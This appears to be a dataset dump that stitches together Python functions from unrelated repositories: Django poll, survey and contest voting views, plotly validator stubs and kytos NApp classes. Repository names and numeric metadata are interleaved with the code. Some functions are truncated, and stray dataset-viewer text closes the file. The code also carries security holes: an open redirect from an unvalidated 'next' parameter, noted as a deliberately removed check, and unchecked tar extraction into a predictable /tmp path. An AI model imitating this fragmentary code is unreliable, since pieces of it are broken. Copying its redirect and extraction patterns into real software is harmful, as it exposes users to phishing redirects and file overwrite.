    expect(execution.stdout).to.have('already exists') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def get_next_url(request):
    """
    Return URL for redirection.

    Checked in order: the POST parameter 'next', then HTTP_REFERER,
    falling back to '/'.
    """
    # NOTE(review): 'next' is returned unvalidated (the startswith('/')
    # check was deliberately commented out upstream) -- potential open
    # redirect; confirm before tightening.
    post_data = request.POST
    if 'next' in post_data:
        return post_data['next']
    return request.META.get('HTTP_REFERER', '/')
3,
2,
3,
2,
1328022570
] |
def survey_check_vote(request, survey):
    """Classify the requesting user's voting state for *survey*.

    Returns one of polls_settings.USER_JUST_VOTED / USER_NO_CHOICE /
    USER_ALLREADY_VOTED / USER_NOT_YET_VOTED. Session/cookie "just voted"
    and "no choice" flags are consumed (deleted) when seen.
    """
    sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
    # removing just voted info from session
    if survey.id in sess_jv:
        del request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME]
        # TODO - del just my poll, not the entire list !
        return polls_settings.USER_JUST_VOTED
    # removing no vote info from session
    sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
    if survey.id in sess_nv:
        del request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME]
        # TODO - del just my poll, not the entire list !
        return polls_settings.USER_NO_CHOICE
    # authenticated user - check session
    if request.user.is_authenticated():
        sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
        if survey.id in sess:
            return polls_settings.USER_ALLREADY_VOTED
        # otherwise check Vote object - just for sure
        if survey.check_vote_by_user(request.user):
            return polls_settings.USER_ALLREADY_VOTED
        return polls_settings.USER_NOT_YET_VOTED
    # anonymous - check cookie
    else:
        cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
        if str(survey.id) in cook:
            return polls_settings.USER_ALLREADY_VOTED
        ip_address = request.META['REMOTE_ADDR']
        # otherwise check Vote object - just for sure
        if survey.check_vote_by_ip_address(ip_address):
            return polls_settings.USER_ALLREADY_VOTED
        return polls_settings.USER_NOT_YET_VOTED | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def poll_vote(request, poll_id):
    """Record a vote for a poll and redirect back to the originating page.

    Rejects inactive polls and repeat voters; records "no choice" in the
    session on invalid form input. Vote bookkeeping goes to the session for
    authenticated users, to a capped cookie for anonymous ones.
    """
    poll_ct = ContentType.objects.get_for_model(Poll)
    poll = get_cached_object_or_404(poll_ct, pk=poll_id)
    url = get_next_url(request)
    # activity check
    if not poll.is_active():
        return HttpResponseRedirect(url)
    # vote check
    if poll_check_vote(request, poll) != polls_settings.USER_NOT_YET_VOTED:
        return HttpResponseRedirect(url)
    # QuestionForm is a form-class factory; instantiate with the POST data
    form = QuestionForm(poll.question)(request.POST)
    # invalid input
    if not form.is_valid():
        # no choice selected error - via session
        sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
        sess_nv.append(poll.id)
        request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME] = sess_nv
        return HttpResponseRedirect(url)
    # vote save
    kwa = {}
    if request.user.is_authenticated():
        kwa['user'] = request.user
    kwa['ip_address'] = request.META['REMOTE_ADDR']
    poll.vote(form.cleaned_data['choice'], **kwa)
    # just voted info session update
    sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
    sess_jv.append(poll.id)
    request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME] = sess_jv
    response = HttpResponseRedirect(url)
    # authenticated user vote - session update
    if request.user.is_authenticated():
        sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
        sess.append(poll.id)
        request.session[polls_settings.POLL_COOKIE_NAME] = sess
    # annonymous user vote - cookies update
    else:
        cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
        # cap the cookie length by dropping the oldest entry
        if len(cook) > polls_settings.POLL_MAX_COOKIE_LENGTH:
            cook = cook[1:]
        cook.append(str(poll.id))
        expires = datetime.strftime(datetime.utcnow() + \
            timedelta(seconds=polls_settings.POLL_MAX_COOKIE_AGE),
            "%a, %d-%b-%Y %H:%M:%S GMT")
        response.set_cookie(
            polls_settings.POLL_COOKIE_NAME,
            value=','.join(cook),
            max_age=polls_settings.POLL_MAX_COOKIE_AGE,
            expires=expires,
            path='/',
            domain=Site.objects.get_current().domain,
            secure=None
        )
    return response | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def survey_vote(request, survey_id):
    """Record a vote for a survey and redirect back to the originating page.

    Mirrors poll_vote: rejects inactive surveys and repeat voters, tracks
    state in the session (authenticated) or a capped cookie (anonymous).
    """
    survey_ct = ContentType.objects.get_for_model(Survey)
    survey = get_cached_object_or_404(survey_ct, pk=survey_id)
    url = get_next_url(request)
    # activity check
    if not survey.current_activity_state == polls_settings.ACTIVITY_ACTIVE:
        return HttpResponseRedirect(url)
    # vote check
    if survey_check_vote(request, survey) != polls_settings.USER_NOT_YET_VOTED:
        return HttpResponseRedirect(url)
    # QuestionForm is a form-class factory; instantiate with the POST data
    form = QuestionForm(survey)(request.POST)
    # invalid input
    if not form.is_valid():
        # no choice selected error - via session
        sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
        sess_nv.append(survey.id)
        request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME] = sess_nv
        return HttpResponseRedirect(url)
    # vote save
    kwa = {}
    if request.user.is_authenticated():
        kwa['user'] = request.user
    kwa['ip_address'] = request.META['REMOTE_ADDR']
    survey.vote(form.cleaned_data['choice'], **kwa)
    # just voted info session update
    sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
    sess_jv.append(survey.id)
    request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME] = sess_jv
    response = HttpResponseRedirect(url)
    # authenticated user vote - session update
    if request.user.is_authenticated():
        sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
        sess.append(survey.id)
        request.session[polls_settings.SURVEY_COOKIE_NAME] = sess
    # annonymous user vote - cookies update
    else:
        cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
        # cap the cookie length by dropping the oldest entry
        if len(cook) > polls_settings.SURVEY_MAX_COOKIE_LENGTH:
            cook = cook[1:]
        cook.append(str(survey.id))
        expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=polls_settings.SURVEY_MAX_COOKIE_AGE), "%a, %d-%b-%Y %H:%M:%S GMT")
        response.set_cookie(
            polls_settings.SURVEY_COOKIE_NAME,
            value=','.join(cook),
            max_age=polls_settings.SURVEY_MAX_COOKIE_AGE,
            expires=expires,
            path='/',
            domain=Site.objects.get_current().domain,
            secure=None
        )
    return response | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_vote(request, context):
    """Validate all question forms plus the contestant form for a contest.

    If everything validates and the contest is active, delegate to
    contest_finish; otherwise re-render the form template with the bound
    forms and activity-state constants in the context.
    """
    contest = context['object']
    forms = []
    forms_are_valid = True
    # question forms
    for question in contest.questions:
        form = QuestionForm(question)(request.POST or None, prefix=str(question.id))
        if not form.is_valid():
            forms_are_valid = False
        forms.append((question, form))
    # contestant form
    initial = {}
    if request.user.is_authenticated():
        # pre-fill from the logged-in user's profile
        initial['name'] = request.user.first_name
        initial['surname'] = request.user.last_name
        initial['email'] = request.user.email
    contestant_form = ContestantForm(request.POST or None, initial=initial)
    if not contestant_form.is_valid():
        forms_are_valid = False
    # saving contestant
    if forms_are_valid and contest.is_active():
        return contest_finish(request, context, forms, contestant_form)
    context.update({
        'forms' : forms,
        'contestant_form' : contestant_form,
        'activity_not_yet_active' : polls_settings.ACTIVITY_NOT_YET_ACTIVE,
        'activity_active' : polls_settings.ACTIVITY_ACTIVE,
        'activity_closed' : polls_settings.ACTIVITY_CLOSED
    })
    return render_to_response(
        get_templates_from_publishable('form.html', context['object']),
        context,
        context_instance=RequestContext(request)
    ) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def render(self, name, value, attrs=None, choices=()):
    """Yield one safe <label><input …> … </label> string per checkbox option.

    NOTE(review): this is a generator (uses yield), not a widget render()
    returning one string -- callers appear to iterate it; confirm before
    using it as a drop-in widget.render().
    """
    if value is None: value = []
    has_id = attrs and 'id' in attrs
    final_attrs = self.build_attrs(attrs, name=name)
    str_values = set([force_unicode(v) for v in value]) # Normalize to strings.
    for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
        # If an ID attribute was given, add a numeric index as a suffix,
        # so that the checkboxes don't all have the same ID attribute.
        if has_id:
            final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
        # check_test closure decides which boxes render as checked
        cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
        option_value = force_unicode(option_value)
        yield mark_safe(u'<label>%s %s</label>' % (cb.render(name, option_value), force_unicode(option_label))) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def render(self, name, value, attrs=None, choices=()):
    """Return the renderer object itself rather than a rendered string."""
    return self.get_renderer(name, value, attrs, choices) | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def QuestionForm(question):
    """Form-class factory: build a Form class for one poll/survey question.

    Chooses a multiple- or single-choice field based on
    question.allow_multiple; 'required' tracks allow_no_choice.
    Returns the class (not an instance) -- callers do
    QuestionForm(q)(request.POST).
    """
    if question.allow_multiple:
        choice_field = forms.ModelMultipleChoiceField(
            queryset=question.choices,
            widget=MyCheckboxSelectMultiple,
            required=not question.allow_no_choice
        )
    else:
        choice_field = forms.ModelChoiceField(
            queryset=question.choices,
            widget=MyRadioSelect,
            empty_label=None,
            required=not question.allow_no_choice
        )

    class _QuestionForm(forms.Form):
        """
        Question form with all its choices
        """
        choice = choice_field

        def choices(self):
            # pair each choice (with fudged percentages) with its widget HTML
            field = self['choice']
            # TODO: move choice percentage to question and use it here!!
            choice_list = fudge_choice_percentages(field.field.queryset)
            for choice, input in zip(choice_list, field.as_widget(field.field.widget)):
                yield choice, input
    return _QuestionForm | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def clean(self):
    """Pass-through clean; antispam validation is still a TODO."""
    # TODO - antispam
    return self.cleaned_data | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_finish(request, context, qforms, contestant_form):
    """Persist a contestant's answers and redirect to the result page.

    Re-renders the form with a 'duplicate' flag if this email already
    entered the contest. Answers are serialised as
    'qid:choice[,choice...]' joined with '|', ordered by question id.
    """
    contest = context['object']
    email = contestant_form.cleaned_data['email']
    if Contestant.objects.filter(email=email, contest=contest).count() > 0:
        context.update({
            'duplicate' : True,
            'forms' : qforms,
            'contestant_form' : contestant_form,
        })
        return render_to_response(
            get_templates_from_publishable('form.html', context['object']),
            context,
            context_instance=RequestContext(request)
        )
    # serialise choices: multiple-choice answers joined by ',', sorted by id
    choices = '|'.join(
        '%d:%s' % (
            question.id,
            question.allow_multiple and ','.join(str(c.id) for c in sorted(f.cleaned_data['choice'], key=lambda ch: ch.id)) or f.cleaned_data['choice'].id)
        for question, f in sorted(qforms, key=lambda q: q[0].id)
    )
    c = Contestant(
        contest=contest,
        choices=choices,
        **contestant_form.cleaned_data
    )
    if request.user.is_authenticated():
        c.user = request.user
    c.save()
    return HttpResponseRedirect(contest.get_absolute_url() + slugify(ugettext('result')) + u'/') | ella/ella-polls | [
3,
2,
3,
2,
1328022570
] |
def contest_conditions(request, context):
    """Render the contest's terms-and-conditions page."""
    return render_to_response(
        get_templates_from_publishable('conditions.html', context['object']),
        context,
        context_instance=RequestContext(request)
    )
def __init__(self, quiz):
    """Build the wizard with one form per quiz question.

    The first question is exposed up front; ``process_step`` advances it.
    """
    form_list = [QuestionForm(q) for q in quiz.questions]
    super(QuizWizard, self).__init__(form_list)
    self.quiz = quiz
    self.extra_context = {
        'object': quiz,
        'question': quiz.questions[0],
        'category': quiz.category,
    }
def process_step(self, request, form, step):
    """Advance the wizard: expose the next question to the template.

    On the last step there is no next question, so the context is left
    untouched.
    """
    if (step + 1) < len(self.form_list):
        self.extra_context['question'] = self.quiz.questions[step + 1]
def result_details(request, context):
    """Render quiz result details, marking the choices the user picked.

    The user's answers arrive in the GET parameter ``RESULT_FIELD`` as
    "qid:choice_ids|qid:choice_ids|..." (same format contest_finish
    produces).  404s when the quiz has no correct answers or the answer
    string does not match the number of questions.
    """
    quiz = context['object']
    if not quiz.has_correct_answers:
        raise Http404
    results = request.GET.get(RESULT_FIELD, '').split('|')
    if len(results) != len(quiz.questions):
        raise Http404
    questions = []
    for question, q_res in zip(quiz.questions, results):
        q_id, id_list = q_res.split(':')
        choices = question.choices
        if question.allow_multiple:
            # Multi-answer: mark every chosen id; set lookup is O(1).
            cl = set(id_list.split(','))
            for ch in choices:
                if str(ch.id) in cl:
                    ch.chosen = True
        else:
            # Single answer: mark the one matching choice and stop.
            for ch in choices:
                if str(ch.id) == id_list:
                    ch.chosen = True
                    break
        questions.append((question, choices))
    context['questions'] = questions
    return render_to_response(
        get_templates_from_publishable('result_detail.html', context['object']),
        context,
        context_instance=RequestContext(request)
    )
def contest(request, context):
    """Entry point for the contest detail page; delegates to contest_vote."""
    return contest_vote(request, context)
def aditional_loss(self):
    # NOTE(review): name keeps its historical misspelling ("aditional")
    # because external callers/overriders depend on it.
    '''
    Add an additional loss term.

    Returns:
        the additional loss, or None when the model defines none (default)
    '''
    return None
def __init__(
self, plotly_name="tickfont", parent_name="layout.ternary.aaxis", **kwargs | plotly/python-api | [
13052,
2308,
13052,
1319,
1385013188
] |
def setup_nodes(self):
    """Start the default 4-node regtest network for this functional test."""
    return start_nodes(4, self.options.tmpdir)
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges. | plotly/python-api | [
13052,
2308,
13052,
1319,
1385013188
] |
def __init__(self, username=None, name=None, version=None,
             repository=None, meta=False):
    """Create a NApp descriptor.

    Args:
        username: author/owner namespace of the NApp.
        name: NApp name.
        version: version tag; any falsy value becomes ``'latest'``.
        repository: base URL of the NApp repository, if any.
        meta: whether this is a meta-NApp.
    """
    self.username = username
    self.name = name
    self.version = version if version else 'latest'
    self.repository = repository
    self.meta = meta
    # Filled in later, e.g. when metadata is loaded from kytos.json.
    self.description = None
    self.tags = []
    self.enabled = False
    self.napp_dependencies = []
def __repr__(self):
    """Debug representation in the form ``NApp(username/name)``."""
    return f"NApp({self.username}/{self.name})"
def __eq__(self, other):
"""Compare username/name strings."""
return isinstance(other, self.__class__) and self.id == other.id | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def id(self):  # pylint: disable=invalid-name
    """Return the "username/name" string (delegates to ``__str__``)."""
    return str(self)
def uri(self):
    """Return a unique identifier of this NApp.

    Empty string when the repository is missing or invalid.
    """
    version = self.version if self.version else 'latest'
    if not self._has_valid_repository():
        return ""
    # Use the next line after Diraol fix redirect using ":" for version
    # return "{}/{}:{}".format(self.repository, self.id, version)
    return "{}/{}-{}".format(self.repository, self.id, version)
def package_url(self):
    """Return a fully qualified URL for a NApp package.

    Empty string when ``uri`` itself is empty (no valid repository).
    """
    if not self.uri:
        return ""
    return "{}.napp".format(self.uri)
def create_from_uri(cls, uri):
    """Return a new NApp instance from a unique identifier.

    Accepted forms: "username/name", optionally prefixed with a
    repository URL ("http(s)://host/username/name") and optionally
    suffixed with ":version".  Returns None when *uri* does not match.
    """
    regex = r'^(((https?://|file://)(.+))/)?(.+?)/(.+?)/?(:(.+))?$'
    match = re.match(regex, uri)
    if not match:
        return None
    # groups()[1] is the repository without the trailing slash;
    # [4]/[5]/[7] are username, name and the optional version.
    return cls(username=match.groups()[4],
               name=match.groups()[5],
               version=match.groups()[7],
               repository=match.groups()[1])
def create_from_json(cls, filename):
    """Return a new NApp instance from a JSON metadata file."""
    with open(filename, encoding='utf-8') as data_file:
        data = json.loads(data_file.read())
    return cls.create_from_dict(data)
def create_from_dict(cls, data):
    """Return a new NApp instance with attributes taken from *data*."""
    napp = cls()
    for attribute, value in data.items():
        setattr(napp, attribute, value)
    return napp
def match(self, pattern):
    """Whether *pattern* occurs in the NApp id, description or tags.

    Case-insensitive substring match.  Returns False when any of the
    searched fields is not a string (TypeError from re).
    """
    try:
        pattern = '.*{}.*'.format(pattern)
        pattern = re.compile(pattern, re.IGNORECASE)
        strings = [self.id, self.description] + self.tags
        return any(pattern.match(string) for string in strings)
    except TypeError:
        return False
def _extract(filename):
    """Extract NApp package to a temporary folder.

    Return:
        pathlib.Path: Temp dir with package contents.
    """
    # NOTE(review): the destination is a predictable path created with
    # os.mkdir in the shared /tmp; tempfile.mkdtemp() would be safer.
    random_string = '{:0d}'.format(randint(0, 10**6))
    tmp = '/tmp/kytos-napp-' + Path(filename).stem + '-' + random_string
    os.mkdir(tmp)
    with tarfile.open(filename, 'r:xz') as tar:
        # NOTE(review): extractall trusts archive member paths; a crafted
        # package could escape `tmp` (path traversal) — validate members.
        tar.extractall(tmp)
    return Path(tmp)
def _update_repo_file(self, destination=None):
    """Create or update the '.repo' file inside the NApp package.

    The file records which repository the package was installed from.
    """
    with open("{}/.repo".format(destination), 'w') as repo_file:
        repo_file.write(self.repository + '\n')
def __init__(self, controller, **kwargs):
    """Constructor of KytosNapps.

    Go through all of the instance methods and select those that have
    the ``events`` attribute, then create a dict mapping each event name
    to the list of methods responsible for handling it.  At the end, the
    ``setup`` method is called as a complement of the init process.

    Args:
        controller: the Kytos controller this NApp runs under.
    """
    Thread.__init__(self, daemon=False)
    self.controller = controller
    self.username = None  # loaded from json
    self.name = None  # loaded from json
    self.meta = False  # loaded from json
    self._load_json()
    # Force a listener with a private method.
    self._listeners = {
        'kytos/core.shutdown': [self._shutdown_handler],
        'kytos/core.shutdown.' + self.napp_id: [self._shutdown_handler]}
    self.__event = Event()
    #: int: Seconds to sleep before next call to :meth:`execute`. If
    #: negative, run :meth:`execute` only once.
    self.__interval = -1
    self.setup()
    #: Add non-private methods that listen to events.
    handler_methods = [getattr(self, method_name) for method_name in
                       dir(self) if method_name[0] != '_' and
                       callable(getattr(self, method_name)) and
                       hasattr(getattr(self, method_name), 'events')]
    # Building the listeners dictionary
    for method in handler_methods:
        for event_name in method.events:
            if event_name not in self._listeners:
                self._listeners[event_name] = []
            self._listeners[event_name].append(method)
def napp_id(self):
    """Return the "username/name" string for this NApp."""
    return "{}/{}".format(self.username, self.name)
def _load_json(self):
    """Update object attributes based on kytos.json.

    The metadata file is looked up next to the module that defines the
    concrete NApp subclass.
    """
    current_file = sys.modules[self.__class__.__module__].__file__
    json_path = os.path.join(os.path.dirname(current_file), 'kytos.json')
    with open(json_path, encoding='utf-8') as data_file:
        data = json.loads(data_file.read())
    for attribute, value in data.items():
        setattr(self, attribute, value)
def run(self):
    """Call the execute method, looping as needed.

    It should not be overridden.  ``execute`` runs once, then repeats
    every ``__interval`` seconds until the shutdown event is set (a
    negative interval means run only once).
    """
    self.notify_loaded()
    LOG.info("Running NApp: %s", self)
    self.execute()
    while self.__interval > 0 and not self.__event.is_set():
        self.__event.wait(self.__interval)
        self.execute()
def _shutdown_handler(self, event):  # pylint: disable=unused-argument
    """Listen shutdown event from kytos.

    This method listens the kytos/core.shutdown event and calls the
    shutdown method from the napp subclass implementation.  The event is
    set first so the ``run`` loop stops waking up.

    Parameters:
        event (:class:`KytosEvent`): event to be listened.
    """
    if not self.__event.is_set():
        self.__event.set()
        self.shutdown()
def setup(self):
"""Replace the 'init' method for the KytosApp subclass.
The setup method is automatically called on the NApp __init__().
Users aren't supposed to call this method directly.
""" | kytos/kytos | [
43,
46,
43,
125,
1465587463
] |
def execute(self):
    """Execute in a loop until 'kytos/core.shutdown' is received.

    The execute method is called by the KytosNApp class.
    Users shouldn't call this method directly.
    """
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.